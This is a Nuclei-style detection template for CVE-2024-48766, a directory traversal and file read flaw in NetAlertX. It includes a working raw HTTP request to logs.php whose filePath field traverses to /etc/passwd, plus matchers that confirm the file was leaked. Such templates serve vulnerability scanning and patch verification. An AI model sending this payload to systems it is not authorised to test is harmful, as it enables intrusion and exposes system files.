漏洞描述
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
CVE-2024-48766: NetAlert X - Arbitary File Read
PoC代码[已公开]
id: CVE-2024-48766
info:
name: NetAlert X - Arbitary File Read
author: s4e-io
severity: critical
description: |
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
impact: |
This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure.
remediation: |
Fixed in v24.10.12
reference:
- https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html
- https://github.com/rapid7/metasploit-framework/pull/19881
- https://github.com/jokob-sk/NetAlertX
classification:
epss-score: 0.77983
epss-percentile: 0.98955
metadata:
verified: true
max-request: 1
vendor: jokob-sk
product: netalertx
fofa-query: "NetAlert X"
tags: cve,cve2024,netalertx,lfi,vkev,vuln
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /php/components/logs.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
items=[{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"{{filename}}","filePath":"../../../../..//etc/passwd","textAreaCssClass":"logs"}]
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(body, "Purge log")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502206599238f059c9c9ab78a795fb2a526b401a03a6b9ce7fd31a9256e112d85f2fb022100adb36683ea55dd70eebf04f5bcc928aafb9388db5aa785d6c728930e2cb55771:922c64590222798bb761d5b6d8e72950